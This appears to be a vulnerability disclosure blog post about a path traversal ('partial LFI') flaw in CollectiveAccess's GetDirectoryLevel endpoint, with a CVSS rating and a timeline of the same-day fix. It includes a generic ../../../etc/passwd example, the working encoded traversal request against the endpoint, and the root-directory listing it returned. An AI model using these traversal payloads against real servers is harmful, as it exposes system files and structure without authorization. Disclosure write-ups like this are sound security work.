Blog

Partial Local File Inclusion (LFI)

What is a Local File Inclusion?

Local File Inclusion (LFI) is a type of vulnerability that occurs when a web application allows an attacker to include or read files on the server. It typically arises from improper input validation or insecure usage of file inclusion functions.

In an LFI vulnerability, an attacker can manipulate user-supplied input, such as a file path or parameter, to trick the application into including files that are located on the server’s file system. This can lead to various security risks, including unauthorized access to sensitive files, execution of arbitrary code, and even server compromise.

Here’s a simplified example of how LFI can occur:

An attacker can exploit this vulnerability by supplying a malicious input that contains a path to a sensitive file on the server:

http://example.com/index.php?page=../../../etc/passwd

A few words about the bug itself

Why is it partial? Because no files could accessed by exploiting the vulnerability.

During a research made on an application, called CollectiveAccess (https://collectiveaccess.org/), I discovered that there is a function called GetDirectoryLevel, where an id parameter is provided by the user. By simply inserting the classic dot-dot-slash payload, the user could escape from the application folder, and discover all the OS level folder structure.

By executing the query as an authenticated user: https://SITE.COM/batch/MediaImport/GetDirectoryLevel?id=%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F&init=&start=0&max=100 the response contains all the folders in the root of the OS.

{"\/|6":{"001":{"item_id":"001","name":"001","fullname":"001","type":"DIR","children":1,"files":0,"subdirectories":1},"bin":{"item_id":"bin","name":"bin","fullname":"bin","type":"DIR","children":1161,"files":1161,"subdirectories":0},"boot":{"item_id":"boot","name":"boot","fullname":"boot","type":"DIR","children":22,"files":18,"subdirectories":4},"carleton":{"item_id":"carleton","name":"carleton","fullname":"carleton","type":"DIR","children":0,"files":0,"subdirectories":0},"data":{"item_id":"data","name":"data","fullname":"data","type":"DIR","children":86,"files":2,"subdirectories":84},"dev":{"item_id":"dev","name":"dev","fullname":"dev","type":"DIR","children":196,"files":176,"subdirectories":20},"dips":{"item_id":"dips","name":"dips","fullname":"dips","type":"DIR","children":4,"files":1,"subdirectories":3},"etc":{"item_id":"etc","name":"etc","fullname":"etc","type":"DIR","children":229,"files":109,"subdirectories":120},"home":{"item_id":"home","name":"home","fullname":"home","type":"DIR","children":12,"files":0,"subdirectories":12},"keybase":{"item_id":"keybase","name":"keybase","fullname":"keybase","type":"DIR","children":0,"files":0,"subdirectories":0},"lib":{"item_id":"lib","name":"lib","fullname":"lib","type":"DIR","children":43,"files":4,"subdirectories":39},"lib64":{"item_id":"lib64","name":"lib64","fullname":"lib64","type":"DIR","children":1433,"files":1360,"subdirectories":73},"magic":{"item_id":"magic","name":"magic","fullname":"magic","type":"FILE"},"media":{"item_id":"media","name":"media","fullname":"media","type":"DIR","children":0,"files":0,"subdirectories":0},"mnt":{"item_id":"mnt","name":"mnt","fullname":"mnt","type":"DIR","children":0,"files":0,"subdirectories":0},"nas":{"item_id":"nas","name":"nas","fullname":"nas","type":"DIR","children":22,"files":5,"subdirectories":17},"opt":{"item_id":"opt","name":"opt","fullname":"opt","type":"DIR","children":3,"files":0,"subdirectories":3},"proc":{"item_id":"proc","name":"proc","fullname":"proc","type":"DIR","children":316,"files":46,"subdirectories":270},"root":{"item_id":"root","name":"root","fullname":"root","type":"DIR","children":0,"files":0,"subdirectories":0},"run":{"item_id":"run","name":"run","fullname":"run","type":"DIR","children":51,"files":16,"subdirectories":35},"sbin":{"item_id":"sbin","name":"sbin","fullname":"sbin","type":"DIR","children":509,"files":509,"subdirectories":0},"srv":{"item_id":"srv","name":"srv","fullname":"srv","type":"DIR","children":0,"files":0,"subdirectories":0},"ssd":{"item_id":"ssd","name":"ssd","fullname":"ssd","type":"DIR","children":1,"files":0,"subdirectories":1},"sys":{"item_id":"sys","name":"sys","fullname":"sys","type":"DIR","children":11,"files":0,"subdirectories":11},"thunderbolt":{"item_id":"thunderbolt","name":"thunderbolt","fullname":"thunderbolt","type":"DIR","children":70,"files":16,"subdirectories":54},"tmp":{"item_id":"tmp","name":"tmp","fullname":"tmp","type":"DIR","children":44,"files":44,"subdirectories":0},"upload":{"item_id":"upload","name":"upload","fullname":"upload","type":"DIR","children":2,"files":0,"subdirectories":2},"usr":{"item_id":"usr","name":"usr","fullname":"usr","type":"DIR","children":12,"files":0,"subdirectories":12},"var":{"item_id":"var","name":"var","fullname":"var","type":"DIR","children":22,"files":0,"subdirectories":22},"web":{"item_id":"web","name":"web","fullname":"web","type":"DIR","children":86,"files":2,"subdirectories":84},"_primaryKey":"name","_itemCount":60}}
 
Takeaway:
Always check for opportunities to escape the folder structure of the application itself!

Severity of the issue
Since authentication required, to gain access to the system folders, I rated as Medium – 6.5 with the following CVSS vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
 

Timeline of the report

  • Issue has been reported on May 25th 2023
  • Issue has been validated on May 26th 2023
  • Issue has been fixed on the same day – May 26th 2023

Thanks for the quick response and even quicker resolution!

For the applied patch, please check out the maintainer’s commit:

https://github.com/collectiveaccess/providence/commit/6afb9850a3a8e6bea2fa6bcd7f8700c843a37507

Tags: , , , ,